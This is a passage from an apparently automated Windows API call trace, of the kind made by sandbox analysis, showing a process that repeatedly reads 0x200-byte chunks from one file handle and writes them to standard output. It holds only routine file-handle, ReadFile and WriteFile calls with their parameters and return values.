lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.797] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.797] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] GetFileType (hFile=0x50) returned 0x1 [0212.797] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.797] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, 
lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.798] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.798] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] GetFileType (hFile=0x50) returned 0x1 [0212.798] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.798] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] GetFileType (hFile=0x50) returned 0x1 [0212.799] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] GetFileType (hFile=0x50) returned 0x1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] GetFileType (hFile=0x50) returned 0x1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] GetFileType (hFile=0x50) returned 0x1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] GetFileType (hFile=0x50) returned 0x1 [0212.799] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.799] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.799] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.799] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.799] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] GetFileType (hFile=0x50) returned 0x1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] GetFileType (hFile=0x50) returned 0x1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] GetFileType (hFile=0x50) returned 0x1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] GetFileType (hFile=0x50) returned 0x1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] GetFileType (hFile=0x50) returned 0x1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, 
lpOverlapped=0x0) returned 1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] GetFileType (hFile=0x50) returned 0x1 [0212.800] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.800] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] GetFileType (hFile=0x50) returned 0x1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] GetFileType (hFile=0x50) returned 0x1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.801] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.801] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.801] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.801] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] GetFileType (hFile=0x50) returned 0x1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] GetFileType (hFile=0x50) returned 0x1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] WriteFile (in: hFile=0x50, 
lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] GetFileType (hFile=0x50) returned 0x1 [0212.801] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.801] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] GetFileType (hFile=0x50) returned 0x1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] GetFileType (hFile=0x50) returned 0x1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] GetFileType (hFile=0x50) returned 0x1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] GetFileType (hFile=0x50) returned 0x1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] GetFileType (hFile=0x50) returned 0x1 [0212.802] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.802] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.803] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.803] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.803] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.803] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] GetFileType (hFile=0x50) returned 0x1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] GetFileType (hFile=0x50) returned 0x1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] GetFileType (hFile=0x50) returned 0x1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 
[0212.803] GetFileType (hFile=0x50) returned 0x1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] GetFileType (hFile=0x50) returned 0x1 [0212.803] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.803] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] GetFileType (hFile=0x50) returned 0x1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] GetFileType (hFile=0x50) returned 0x1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] GetFileType (hFile=0x50) returned 0x1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.804] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.804] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.804] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.804] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] GetFileType (hFile=0x50) returned 0x1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] GetFileType (hFile=0x50) returned 0x1 [0212.804] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.804] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] GetFileType (hFile=0x50) returned 0x1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] GetFileType (hFile=0x50) returned 0x1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] GetFileType (hFile=0x50) returned 0x1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: 
lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] GetFileType (hFile=0x50) returned 0x1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] GetFileType (hFile=0x50) returned 0x1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.805] WriteFile (in: hFile=0x50, lpBuffer=0x2eeef4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeef4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.806] GetFileType (hFile=0x50) returned 0x1 [0212.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.806] WriteFile (in: hFile=0x50, lpBuffer=0x2eef44*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eef44*, lpNumberOfBytesWritten=0x2edf48*=0x20, lpOverlapped=0x0) returned 1 [0212.806] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.806] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edf34 | out: lpNewFilePointer=0x0) returned 1 [0212.806] _get_osfhandle (_FileHandle=4) returned 0x58 [0212.806] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.806] GetFileType (hFile=0x50) returned 0x1 [0212.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.806] GetFileType (hFile=0x50) returned 0x1 [0212.806] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0212.806] WriteFile (in: hFile=0x50, lpBuffer=0x2eed64*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.806] GetFileType (hFile=0x50) returned 0x1 [0212.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.806] WriteFile (in: hFile=0x50, lpBuffer=0x2eedb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eedb4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.806] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] GetFileType (hFile=0x50) returned 0x1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] WriteFile (in: hFile=0x50, lpBuffer=0x2eee04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee04*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] GetFileType (hFile=0x50) returned 0x1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] WriteFile (in: hFile=0x50, lpBuffer=0x2eee54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eee54*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] GetFileType (hFile=0x50) returned 0x1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] WriteFile (in: hFile=0x50, lpBuffer=0x2eeea4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2edf48, lpOverlapped=0x0 | out: lpBuffer=0x2eeea4*, lpNumberOfBytesWritten=0x2edf48*=0x50, lpOverlapped=0x0) returned 1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.807] GetFileType (hFile=0x50) returned 0x1 [0212.807] _get_osfhandle (_FileHandle=1) returned 0x50 
